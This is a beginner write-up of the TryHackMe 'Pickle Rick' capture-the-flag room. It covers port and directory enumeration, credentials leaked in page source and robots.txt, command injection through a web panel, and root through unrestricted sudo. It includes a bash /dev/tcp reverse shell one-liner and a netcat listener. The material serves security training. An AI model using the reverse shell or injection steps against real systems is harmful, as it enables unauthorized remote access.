Cyber Security Writeups

Pickle Rick TryHackMe Walkthrough writeup

Introduction

Hey, folks with you volk in this writeup we are going to solve and explain Pickle Rick Challenge on TryHackMe.

The difficulty of challenge is a beginner-level challenge.

Tools Used

Enumeration

First, I Scanned the target using Nmap to know the open ports, OS, Version, etc… by the following command:

nmap -A [Machine_IP]

-A: OS detection, Script Scanning, Version detection, and traceroute

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 bc:c7:d4:7c:21:45:0d:24:d1:30:3a:49:bf:76:5e:ed (RSA)
|   256 88:d5:bc:e4:d2:ef:2a:09:0f:e8:17:95:09:aa:46:77 (ECDSA)
|_  256 d5:bb:c3:48:97:21:55:2b:70:76:2e:07:4a:bf:70:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Lets check port 80 (HTTP)

nothing important So i decided to check the source code

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
  <style>
  .jumbotron {
    background-image: url("assets/rickandmorty.jpeg");
    background-size: cover;
    height: 340px;
  }
  </style>
</head>
<body>

  <div class="container">
    <div class="jumbotron"></div>
    <h1>Help Morty!</h1></br>
    <p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
    <p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
    I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
  </div>

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

</body>
</html>

nice we found a username that is leaked in the source code, We will need it after that,I usually check the

robots.txt sometimes there is important information on this page, When I accessed I found a word and I guess

that’s the password

 

Now let’s make a brute force directory using gobuster

gobuster dir -u http://10.10.42.251/ -w /usr/share/dirb/wordlists/common.txt -x php,html 2

dir: use directory brute force

-u: to specify the target URL

-w: to specify the path of the wordlist you want to use 

-x to brute force directory /2100 and at the end of the file, the extension will be .php,html

that’s the result:  

===============================================================
/.hta.php             (Status: 403) [Size: 295]
/.hta.html            (Status: 403) [Size: 296]
/.hta                 (Status: 403) [Size: 291]
/.htaccess.php        (Status: 403) [Size: 300]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd.php        (Status: 403) [Size: 300]
/.htaccess.html       (Status: 403) [Size: 301]
/.htpasswd.html       (Status: 403) [Size: 301]
/assets               (Status: 301) [Size: 313] [--> http://10.10.42.251/assets/]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]                   
/index.html           (Status: 200) [Size: 1062]                                 
/index.html           (Status: 200) [Size: 1062]                                 
/login.php            (Status: 200) [Size: 882]                                  
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                   
/robots.txt           (Status: 200) [Size: 17]                                   
/server-status        (Status: 403) [Size: 300]                                  
                                                                                 
===============================================================

So I found a login directory (login.php)

I Tried the username and the password that I Found.

Username: R1ckRul3s

Password: Wubbalubbadubdub

And it worked 🙂

When I Saw command panel first thing come to my mind is command injection so I decided to type ls

It Worked but when I try to use the cat command to cat any text file I got a message saying that

the command is disabled (cat)

Gaining Access

I decided to use this bash reverse shell.

bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'

And use Netcat to listen for any coming connections

nc -lvp (PORT)

-l : to listen for any coming connections (listen mode)

-v : verbose

-p : to choose the port you want to listen on for example: 1337

and we got connection, Now we can run cat command

www-data@ip-10-10-42-251:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

By reading Sup3rS3cretPickl3Ingred.txt file, we answered the first question 

And I Found the second ingredient in /home/rick directory

$ cd /home/rick
$ ls
second ingredients
$ cat "/home/rick/second ingredients"
1 jerry tear

By reading second ingredients file, we answered the second question

Privilege Escalation

Usually, the last flag (in this challenge its ingredients) is in the root directory

so let’s try sudo -l to see the commands that can be executed by this user as root

Matching Defaults entries for www-data on
    ip-10-10-42-251.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-42-251.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

Surprisingly We can use any sudo command, So let’s type sudo su to be root and change directory to root 

to access the last file 

 

$ sudo su
#cd /root
#ls
3rd.txt
snap
#cat 3rd.txt
3rd ingredients: fleeb juice

And we got the root flag (Last flag) :), Thanks For reading the writeup see you in the next writeup

Volk_407
My name is Moustafa I am a Penetration tester 💻 | Bug Hunter 🐛 | Video Editor 🎥 Acknowledgements: Marvel/TWDC | Pinterest | Picsart | Vanilla Certifications: eJPT | eWPTX | eMAPT | ICCA | CAP